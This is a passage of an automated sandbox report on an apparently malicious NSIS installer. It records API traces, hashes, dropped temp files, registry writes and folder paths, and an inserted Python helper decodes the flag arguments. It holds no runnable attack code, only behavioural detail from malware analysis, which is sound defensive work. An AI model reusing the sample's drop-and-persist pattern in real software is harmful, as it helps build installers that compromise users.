                                                                      • CoTaskMemFree.OLE32(007924D8), ref: 00406462
                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                      • lstrlenW.KERNEL32(Call,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 004064E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 717251189-1230650788
                                                                      • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                      • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                      • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                      • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

Control-flow Graph (graph image not captured): function 0040176F, basic blocks 40176f-402ad4; calls lstrcatW, CompareFileTime, SetFileTime, CloseHandle and internal functions 402c41, 405be3, 406297, 405b6c, 40652b, 4065da, 405d68, 405d8d, 4052ff, 403116, 4062b9, 4058fd.
                                                                      APIs
                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,?,00000031), ref: 004017B0
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,?,00000031), ref: 004017D5
                                                                        • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                        • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,774D23A0), ref: 0040535A
                                                                        • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\nsg9061.tmp$C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll$Call
                                                                      • API String ID: 1941528284-840365264
                                                                      • Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                      • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                      • Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                      • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E

Control-flow Graph (graph image not captured): function 00406601, basic blocks 406601-40666e; calls GetSystemDirectoryW, wsprintfW, LoadLibraryExW.
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                      • wsprintfW.USER32 ref: 00406653
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-1946221925
                                                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                      • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                      • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98
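
The API listings above (and the CreateDirectoryW/SetFileSecurityW record further down this page) show raw hexadecimal arguments such as 00000008 and 80000007; the flag names are what a triager actually wants to read. The Python below is an added example written for this editorial pass, not code from the Joe Sandbox report or from the NSIS project: it parses bullet lines in the exact shape the APIs sections use, decodes the dwFlags argument of LoadLibraryExW and the SecurityInformation argument of SetFileSecurityW against the documented Win32 bit values, records "Part of subcall function" parents, and collects file-system paths passed as arguments. The sample lines are copied from this report; the parser, the positional-argument table FLAG_ARGS and the helper names are the editor's own assumptions.

```python
"""Triage helper for Joe Sandbox 'APIs' bullet lines (added example).

The sample lines are copied from the report above; the parser and the
flag tables are this editor's own, not Joe Sandbox or NSIS code.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Sample input copied from the APIs sections of this report (raw string so the
# Windows backslashes survive).  The last line has no argument list at all.
SAMPLE = r"""
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\yVVZdG2NJX.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
  • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
• lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
• lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,?,00000031), ref: 004017B0
• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
• SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
• GetLastError.KERNEL32 ref: 00405825
"""

# One bullet: optional subcall prefix, Api.MODULE, optional (args), ref: address.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Absolute or root-relative Windows path ("C:\..." or "\Microsoft\...").
PATH_RE = re.compile(r"^(?:[A-Za-z]:)?\\")

# Documented Win32 bit values (libloaderapi.h / winnt.h).
LOAD_LIBRARY_FLAGS = {
    0x00000001: "DONT_RESOLVE_DLL_REFERENCES",
    0x00000002: "LOAD_LIBRARY_AS_DATAFILE",
    0x00000008: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x00000010: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x00000100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x00000200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
    0x00000400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x00000800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    0x00001000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}
SECURITY_INFORMATION = {
    0x00000001: "OWNER_SECURITY_INFORMATION",
    0x00000002: "GROUP_SECURITY_INFORMATION",
    0x00000004: "DACL_SECURITY_INFORMATION",
    0x00000008: "SACL_SECURITY_INFORMATION",
    0x00000010: "LABEL_SECURITY_INFORMATION",
    0x10000000: "UNPROTECTED_SACL_SECURITY_INFORMATION",
    0x20000000: "UNPROTECTED_DACL_SECURITY_INFORMATION",
    0x40000000: "PROTECTED_SACL_SECURITY_INFORMATION",
    0x80000000: "PROTECTED_DACL_SECURITY_INFORMATION",
}
# Assumption: which zero-based positional argument of which API is a bitmask.
FLAG_ARGS = {
    "LoadLibraryExW": (2, LOAD_LIBRARY_FLAGS),
    "SetFileSecurityW": (1, SECURITY_INFORMATION),
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int
    parent: Optional[int] = None          # caller address for "Part of subcall" lines
    flags: list[str] = field(default_factory=list)
    paths: list[str] = field(default_factory=list)


def decode_flags(value: int, table: dict[int, str]) -> list[str]:
    """Name every known bit in value, lowest bit first; report leftovers as hex."""
    names, rest = [], value
    for bit, name in sorted(table.items()):
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def parse_api_lines(text: str) -> list[ApiCall]:
    """Turn report bullet lines into ApiCall records; non-matching lines are skipped."""
    calls: list[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        call = ApiCall(api=m.group("api"), module=m.group("module"), args=args,
                       ref=int(m.group("ref"), 16),
                       parent=int(m.group("parent"), 16) if m.group("parent") else None)
        if call.api in FLAG_ARGS:
            idx, table = FLAG_ARGS[call.api]
            if idx < len(args) and args[idx] != "?":   # "?" means the sandbox could not resolve it
                call.flags = decode_flags(int(args[idx], 16), table)
        call.paths = [a for a in args if PATH_RE.match(a)]
        calls.append(call)
    return calls


def summarize(calls: list[ApiCall]) -> dict:
    """Compact view: distinct APIs, paths seen as arguments, decoded flags, subcall parents."""
    return {
        "apis": sorted({c.api for c in calls}),
        "paths": sorted({p for c in calls for p in c.paths}),
        "flags": {c.api: c.flags for c in calls if c.flags},
        "subcalls": {c.api: c.parent for c in calls if c.parent is not None},
    }


if __name__ == "__main__":
    for key, value in summarize(parse_api_lines(SAMPLE)).items():
        print(f"{key}: {value}")
```

Read against this report, 00000008 at LoadLibraryExW decodes to LOAD_WITH_ALTERED_SEARCH_PATH on a full path that the same function builds from GetSystemDirectoryW and "%s%S.dll", and 80000007 at SetFileSecurityW decodes to owner, group and a protected DACL. Both are the hardened patterns an installer stub uses against DLL search-order and temp-directory hijacking rather than attacker behaviour, so they should not be counted as indicators on their own; the paths collected from lstrcatW and the dropped nsg9061.tmp\System.dll plugin are the parts worth following up.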

Control-flow Graph (graph image not captured): function 00403116, basic blocks 403116-40330b; calls GetTickCount, MulDiv, wsprintfW and internal functions 40330e, 403324, 4067d2, 405e3f, 4052ff.
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: ... %d%%
                                                                      • API String ID: 551687249-2449383134
                                                                      • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                      • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
                                                                      • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                      • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

                                                                      Control-flow Graph
                                                                      control_flow_graph 982 4057ce-405819 CreateDirectoryW 983 40581b-40581d 982->983 984 40581f-40582c GetLastError 982->984 985 405846-405848 983->985 984->985 986 40582e-405842 SetFileSecurityW 984->986 986->983 987 405844 GetLastError 986->987 987->985
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                      • GetLastError.KERNEL32 ref: 00405825
                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                      • GetLastError.KERNEL32 ref: 00405844
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 3449924974-3080008178
                                                                      • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                      • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                      • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                      • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9

                                                                      Control-flow Graph
                                                                      control_flow_graph 988 405dbc-405dc8 989 405dc9-405dfd GetTickCount GetTempFileNameW 988->989 990 405e0c-405e0e 989->990 991 405dff-405e01 989->991 993 405e06-405e09 990->993 991->989 992 405e03 991->992 992->993
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00405DDA
                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\yVVZdG2NJX.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6), ref: 00405DF5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-3304089906
                                                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                      • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                      • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

                                                                      Control-flow Graph
                                                                      control_flow_graph 994 703d177b-703d17ba call 703d1b63 998 703d18da-703d18dc 994->998 999 703d17c0-703d17c4 994->999 1000 703d17cd-703d17da call 703d2398 999->1000 1001 703d17c6-703d17cc call 703d2356 999->1001 1006 703d17dc-703d17e1 1000->1006 1007 703d180a-703d1811 1000->1007 1001->1000 1010 703d17fc-703d17ff 1006->1010 1011 703d17e3-703d17e4 1006->1011 1008 703d1831-703d1835 1007->1008 1009 703d1813-703d182f call 703d256d call 703d15b4 call 703d1272 GlobalFree 1007->1009 1012 703d1837-703d1880 call 703d15c6 call 703d256d 1008->1012 1013 703d1882-703d1888 call 703d256d 1008->1013 1034 703d1889-703d188d 1009->1034 1010->1007 1014 703d1801-703d1802 call 703d2d2f 1010->1014 1016 703d17ec-703d17ed call 703d2a74 1011->1016 1017 703d17e6-703d17e7 1011->1017 1012->1034 1013->1034 1027 703d1807 1014->1027 1030 703d17f2 1016->1030 1022 703d17e9-703d17ea 1017->1022 1023 703d17f4-703d17fa call 703d2728 1017->1023 1022->1007 1022->1016 1033 703d1809 1023->1033 1027->1033 1030->1027 1033->1007 1037 703d188f-703d189d call 703d2530 1034->1037 1038 703d18ca-703d18d1 1034->1038 1044 703d189f-703d18a2 1037->1044 1045 703d18b5-703d18bc 1037->1045 1038->998 1040 703d18d3-703d18d4 GlobalFree 1038->1040 1040->998 1044->1045 1047 703d18a4-703d18ac 1044->1047 1045->1038 1046 703d18be-703d18c9 call 703d153d 1045->1046 1046->1038 1047->1045 1049 703d18ae-703d18af FreeLibrary 1047->1049 1049->1045
                                                                      APIs
                                                                        • Part of subcall function 703D1B63: GlobalFree.KERNEL32(?), ref: 703D1DB6
                                                                        • Part of subcall function 703D1B63: GlobalFree.KERNEL32(?), ref: 703D1DBB
                                                                        • Part of subcall function 703D1B63: GlobalFree.KERNEL32(?), ref: 703D1DC0
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D1829
                                                                      • FreeLibrary.KERNEL32(?), ref: 703D18AF
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D18D4
                                                                        • Part of subcall function 703D2356: GlobalAlloc.KERNEL32(00000040,?), ref: 703D2387
                                                                        • Part of subcall function 703D2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,703D17FA,00000000), ref: 703D27F8
                                                                        • Part of subcall function 703D15C6: lstrcpyW.KERNEL32(?,703D4020,00000000,703D15C3,?,00000000,703D1753,00000000), ref: 703D15DC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                      • String ID:
                                                                      • API String ID: 1791698881-3916222277
                                                                      • Opcode ID: 678d075bc1a40b6ab629da60371d05933412912d436d54b86cad1af6269a6162
                                                                      • Instruction ID: be20e2637595e1f7ce31f86eb87100b2acba9c4cf1801f5ad60fcb6bcf488131
                                                                      • Opcode Fuzzy Hash: 678d075bc1a40b6ab629da60371d05933412912d436d54b86cad1af6269a6162
                                                                      • Instruction Fuzzy Hash: 39419A73800305ABDB01DF30E984F8E77ADAB11311F144569FA4B9E396DBB89985DB60

                                                                      Control-flow Graph
                                                                      control_flow_graph 1051 4023e4-402415 call 402c41 * 2 call 402cd1 1058 402ac5-402ad4 1051->1058 1059 40241b-402425 1051->1059 1060 402427-402434 call 402c41 lstrlenW 1059->1060 1061 402438-40243b 1059->1061 1060->1061 1065 40243d-40244e call 402c1f 1061->1065 1066 40244f-402452 1061->1066 1065->1066 1067 402463-402477 RegSetValueExW 1066->1067 1068 402454-40245e call 403116 1066->1068 1072 402479 1067->1072 1073 40247c-40255d RegCloseKey 1067->1073 1068->1067 1072->1073 1073->1058 1076 40288b-402892 1073->1076 1076->1058
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
